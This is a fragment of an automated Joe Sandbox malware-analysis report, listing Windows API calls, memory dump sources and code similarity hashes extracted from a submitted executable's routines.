                                                                                    • GetLastError.KERNEL32(?,00177778,00172213,00000000,00000000,00000000,?,00177975,00000006,FlsSetValue,00183768,00183770,00000000,00000364,?,001763F1), ref: 0017780F
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00177778,00172213,00000000,00000000,00000000,?,00177975,00000006,FlsSetValue,00183768,00183770,00000000), ref: 0017781D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 5ed6571ec99fad3c70336efeef44b8d331fc880df62a813925a40eac91d16537
                                                                                    • Instruction ID: 7394821a2b8734c3e8005511d1509887731f69c761a1ee5cc287bcaa96649494
                                                                                    • Opcode Fuzzy Hash: 5ed6571ec99fad3c70336efeef44b8d331fc880df62a813925a40eac91d16537
                                                                                    • Instruction Fuzzy Hash: 1101F7327092269BC7664B68DC4CE6A3BA8AF09BB1F214624F90ED75C0D720DE41C7E0
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0016992F
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00169940
                                                                                    • TranslateMessage.USER32(?), ref: 0016994A
                                                                                    • DispatchMessageW.USER32(?), ref: 00169954
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 4217535847-0
                                                                                    • Opcode ID: 83ced71db3443ae5e620e81c83ec12184d2581cef26a7949b9f88c152f3e255b
                                                                                    • Instruction ID: df072cdbeb2256e353d18115a854e00855f603c4799d8acc72ca4549c1dc2d88
                                                                                    • Opcode Fuzzy Hash: 83ced71db3443ae5e620e81c83ec12184d2581cef26a7949b9f88c152f3e255b
                                                                                    • Instruction Fuzzy Hash: 46E0ED72C0212EA7DB20ABE6AC4CCDB7F6CEF062657404016B519D3800D6789645C7F1
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_0000FD61,?,00000000,00000000), ref: 0015FBD5
                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0015FC1C
                                                                                      • Part of subcall function 00156DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00156DF1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                    • String ID: CreateThread failed
                                                                                    • API String ID: 2655393344-3849766595
                                                                                    • Opcode ID: c9703943c817e7eefbdcf6676ae0088571f36702f4923d9a762fee3a104919fe
                                                                                    • Instruction ID: 4ccbe2355d1745f3f5f3ec95c9cda734b756a2596a6465c73741ac735662317d
                                                                                    • Opcode Fuzzy Hash: c9703943c817e7eefbdcf6676ae0088571f36702f4923d9a762fee3a104919fe
                                                                                    • Instruction Fuzzy Hash: 1D01D67134470EABE6207F98DC42F677769EB54752F20043EFD929A580CBB1A84A8B70
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,0015C853,00000001,?,?,?,00000000,0016420B,?,?,?,?,?,00163CB0), ref: 00159BE3
                                                                                    • WriteFile.KERNEL32(?,00000000,?,00163EB8,00000000,?,?,00000000,0016420B,?,?,?,?,?,00163CB0,?), ref: 00159C23
                                                                                    • WriteFile.KERNELBASE(?,00000000,?,00163EB8,00000000,?,00000001,?,?,0015C853,00000001,?,?,?,00000000,0016420B), ref: 00159C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite$Handle
                                                                                    • String ID:
                                                                                    • API String ID: 4209713984-0
                                                                                    • Opcode ID: 5bf159867c7a8aef6922f97e9057889d84bbb970cf35385c26ea103fa8fdd1e2
                                                                                    • Instruction ID: 25f116e656f0b1899e9f215398b087e609f55f53688af86edf0c689553ed12f6
                                                                                    • Opcode Fuzzy Hash: 5bf159867c7a8aef6922f97e9057889d84bbb970cf35385c26ea103fa8fdd1e2
                                                                                    • Instruction Fuzzy Hash: 1F310371108609EFEB209E14D948FA6BBA8EB50702F004119F9B59B5D0C775E88CCBA3
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 00159EAD
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 00159EE0
                                                                                    • GetLastError.KERNEL32(?,?,?,?,00159D92,?,00000001,00000000,?,?), ref: 00159EFD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 2485089472-0
                                                                                    • Opcode ID: c595d190406ec23755923d389050679ac7fe20c9f893798e56e6d4dbe2cdfc08
                                                                                    • Instruction ID: b0575b8fefa013f3dba6ffbf7c0ab9d14aa96290fb4b4fb28bc09a28e720c592
                                                                                    • Opcode Fuzzy Hash: c595d190406ec23755923d389050679ac7fe20c9f893798e56e6d4dbe2cdfc08
                                                                                    • Instruction Fuzzy Hash: 53019271110158E6DB21EA648C86FFE775CDF1A783F080456FC75DE491DB608A8CA6E3
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3519838083-0
                                                                                    • Opcode ID: 8d08f4997a612bc569a591e155e00b82747890917d6b0e2ca51b256b33dabe87
                                                                                    • Instruction ID: 93c1d36cf9cc8db0b6bfd11c07762b08b4fc2271732ba4a0278cad6314331f6a
                                                                                    • Opcode Fuzzy Hash: 8d08f4997a612bc569a591e155e00b82747890917d6b0e2ca51b256b33dabe87
                                                                                    • Instruction Fuzzy Hash: 9E119170A01344DFDB14EBF89915BBEBBE4AFA4301F14056EA8999B242DBB45E04C7D1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3519838083-2756464174
                                                                                    • Opcode ID: 629610ef0e1bcc2612b9b0aceae2be40536422a7a3eefa9bcde9e40189aca3b6
                                                                                    • Instruction ID: 89049ce228760ac5022968a03ba13749fc034e3656cfd07b0e68c3fe049fabf2
                                                                                    • Opcode Fuzzy Hash: 629610ef0e1bcc2612b9b0aceae2be40536422a7a3eefa9bcde9e40189aca3b6
                                                                                    • Instruction Fuzzy Hash: 7D61A071500B44EEDB25DB70CC41AE7B7F8AB24342F84495EA9BA8B142E7326A4CCF50
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 001782E8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-3916222277
                                                                                    • Opcode ID: 739f9ee2bccc746f06e1637edf19d9a2c0fbe7a1dbfd6d4b2ea3293a80ff61c0
                                                                                    • Instruction ID: 627e93d6d38f067fa1544b70c6bdc58a159a7c839435872306202c37408be330
                                                                                    • Opcode Fuzzy Hash: 739f9ee2bccc746f06e1637edf19d9a2c0fbe7a1dbfd6d4b2ea3293a80ff61c0
                                                                                    • Instruction Fuzzy Hash: 96415A7094824C9EDF268F288C88BFABBF9EF05704F1444ECE58E86142D7359A45CF20
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00151DA6
                                                                                      • Part of subcall function 00153AA3: __EH_prolog.LIBCMT ref: 00153AA8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3519838083-2756464174
                                                                                    • Opcode ID: 943d5b0be3526e2b879fbff0b8f86ca00ef39ca1fd21cfd2ebcd4da3ce0760cf
                                                                                    • Instruction ID: 4b80d0c05a504edb7cbf2ceacb065cbb8ed3361f718fb2a03f48859263e2cdd5
                                                                                    • Opcode Fuzzy Hash: 943d5b0be3526e2b879fbff0b8f86ca00ef39ca1fd21cfd2ebcd4da3ce0760cf
                                                                                    • Instruction Fuzzy Hash: F1213935904209EFCB16DF98C942AEEFBF6EF5C300B10046DE855A7251CB325A15CB60
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog
                                                                                    • String ID: CMT
                                                                                    • API String ID: 3519838083-2756464174
                                                                                    • Opcode ID: 7dd12df4db7c84debbb0da8e4747a8e8ad8dd1ede1e93c7dd0f4d9ecd92d9e67
                                                                                    • Instruction ID: 9a38af07d1a0c38192f644cc48b43b962b2aeed048744bf1e67b5ad18ffff7b3
                                                                                    • Opcode Fuzzy Hash: 7dd12df4db7c84debbb0da8e4747a8e8ad8dd1ede1e93c7dd0f4d9ecd92d9e67
                                                                                    • Instruction Fuzzy Hash: 5811E4B1A00202FFDB05DF64C495ABEF7AABF55305F04401AEC259F241DB309959DB90
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 00177A7A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: LCMapStringEx
                                                                                    • API String ID: 2568140703-3893581201
                                                                                    • Opcode ID: 7595974e7e7a3e7bf3840db0f21101578fc91bd97b9f382a7db8178fcee3cc28
                                                                                    • Instruction ID: 0aafbef2b48a732bca6ffa68813f78ba70667c3ea79263aa4175972eb665a091
                                                                                    • Opcode Fuzzy Hash: 7595974e7e7a3e7bf3840db0f21101578fc91bd97b9f382a7db8178fcee3cc28
                                                                                    • Instruction Fuzzy Hash: F801D37664420DBBCF02AF90DC0AEAE7F72EF48750F458114FE1966160CB76DA71AB81
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0017709A), ref: 001779F2
                                                                                    Strings
                                                                                    • InitializeCriticalSectionEx, xrefs: 001779C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                    • API String ID: 2593887523-3084827643
                                                                                    • Opcode ID: 59570abb12f7b4e67d36cfaa3ae6e7a467fc459a6a16ad84cab7b7a7761230b1
                                                                                    • Instruction ID: 692370d1904a11d8aee99a886fbb14197943b344958f40fc94a74c634b7fcf84
                                                                                    • Opcode Fuzzy Hash: 59570abb12f7b4e67d36cfaa3ae6e7a467fc459a6a16ad84cab7b7a7761230b1
                                                                                    • Instruction Fuzzy Hash: 2EF0B472A4520CBBCB056F50DC0AC9EBF65DF08720F408124FD19561A0DB728F109BC0
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc
                                                                                    • API String ID: 2773662609-671089009
                                                                                    • Opcode ID: eb9337fc30f98a10b154013eaaf880c17d2cf27121340f210cc8eed757aa2e45
                                                                                    • Instruction ID: 2fa9a6c54372db6f8819b8c2882ba7c54d07ac67c55c90049fec661b517f587e
                                                                                    • Opcode Fuzzy Hash: eb9337fc30f98a10b154013eaaf880c17d2cf27121340f210cc8eed757aa2e45
                                                                                    • Instruction Fuzzy Hash: 32E0E575B45218BBD319BF64EC0A96E7BA4DF58B20F414165FC0967280DF714F418BC6
                                                                                    APIs
                                                                                    • try_get_function.LIBVCRUNTIME ref: 00171DAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: try_get_function
                                                                                    • String ID: FlsAlloc
                                                                                    • API String ID: 2742660187-671089009
                                                                                    • Opcode ID: c859220a579db8e8313cad96b8bc9d0a5d06503d76a15b5084fe7c7c97c11484
                                                                                    • Instruction ID: d25e440a8c344cefad901177de0a83b53d05c47fe4c1a48b4043502a1f2b04f5
                                                                                    • Opcode Fuzzy Hash: c859220a579db8e8313cad96b8bc9d0a5d06503d76a15b5084fe7c7c97c11484
                                                                                    • Instruction Fuzzy Hash: 74D05B37F822287ED55536D5EC0699A7E5C8B00FB1F040051FF0C67146979146515BD1
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016CD6E
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID: 3Ro
                                                                                    • API String ID: 1269201914-1492261280
                                                                                    • Opcode ID: 2c24d47879e798f65046d50befb77e9481b27ac7469fecb8a671ebc88f56178f
                                                                                    • Instruction ID: c603beeafb7e2b1bb6d0fd9ecb8b11baa10632317897659f0fa8ea853521e77e
                                                                                    • Opcode Fuzzy Hash: 2c24d47879e798f65046d50befb77e9481b27ac7469fecb8a671ebc88f56178f
                                                                                    • Instruction Fuzzy Hash: 97B012C1299001FE712CB285AF02C3B010CC6D0F90370446FF882E5140BB405E1286B2
                                                                                    APIs
                                                                                      • Part of subcall function 001781EB: GetOEMCP.KERNEL32(00000000,?,?,00178474,?), ref: 00178216
                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,001784B9,?,00000000), ref: 0017868C
                                                                                    • GetCPInfo.KERNEL32(00000000,001784B9,?,?,?,001784B9,?,00000000), ref: 0017869F
Memory Dump Source
• Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
• Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_150000_file.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID:
• API String ID: 546120528-0
APIs
• __EH_prolog.LIBCMT ref: 00151383
  • Part of subcall function 00155FB1: __EH_prolog.LIBCMT ref: 00155FB6
  • Part of subcall function 0015C413: __EH_prolog.LIBCMT ref: 0015C418
  • Part of subcall function 0015C413: new.LIBCMT ref: 0015C45B
  • Part of subcall function 0015C413: new.LIBCMT ref: 0015C47F
• new.LIBCMT ref: 001513FB
  • Part of subcall function 0015AC66: __EH_prolog.LIBCMT ref: 0015AC6B
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
• __EH_prolog.LIBCMT ref: 00151383
  • Part of subcall function 00155FB1: __EH_prolog.LIBCMT ref: 00155FB6
  • Part of subcall function 0015C413: __EH_prolog.LIBCMT ref: 0015C418
  • Part of subcall function 0015C413: new.LIBCMT ref: 0015C45B
  • Part of subcall function 0015C413: new.LIBCMT ref: 0015C47F
• new.LIBCMT ref: 001513FB
  • Part of subcall function 0015AC66: __EH_prolog.LIBCMT ref: 0015AC6B
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
APIs
  • Part of subcall function 0017631F: GetLastError.KERNEL32(?,0018CBE8,00172674,0018CBE8,?,?,00172213,?,?,0018CBE8), ref: 00176323
  • Part of subcall function 0017631F: _free.LIBCMT ref: 00176356
  • Part of subcall function 0017631F: SetLastError.KERNEL32(00000000,?,0018CBE8), ref: 00176397
  • Part of subcall function 0017631F: _abort.LIBCMT ref: 0017639D
  • Part of subcall function 00178576: _abort.LIBCMT ref: 001785A8
  • Part of subcall function 00178576: _free.LIBCMT ref: 001785DC
  • Part of subcall function 001781EB: GetOEMCP.KERNEL32(00000000,?,?,00178474,?), ref: 00178216
• _free.LIBCMT ref: 001784CF
• _free.LIBCMT ref: 00178505
Similarity
• API ID: _free$ErrorLast_abort
• String ID:
• API String ID: 2991157371-0
APIs
• CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00159B87,?,?,00157735), ref: 00159579
• CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00159B87,?,?,00157735), ref: 001595AE
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00157436,?,?,?), ref: 00159A2C
• SetFileTime.KERNELBASE(?,?,?,?), ref: 00159ADC
Similarity
• API ID: File$BuffersFlushTime
• String ID:
• API String ID: 1392018926-0
APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 00177795
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001777A2
Similarity
• API ID: AddressProc__crt_fast_encode_pointer
• String ID:
• API String ID: 2279764990-0
APIs
• SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00159B21
• GetLastError.KERNEL32 ref: 00159B2D
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
APIs
• SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 001598EB
• GetLastError.KERNEL32 ref: 001598F8
  • Part of subcall function 001596AA: __EH_prolog.LIBCMT ref: 001596AF
Similarity
• API ID: ErrorFileH_prologLastPointer
• String ID:
• API String ID: 4236474358-0
APIs
• _free.LIBCMT ref: 00175B0B
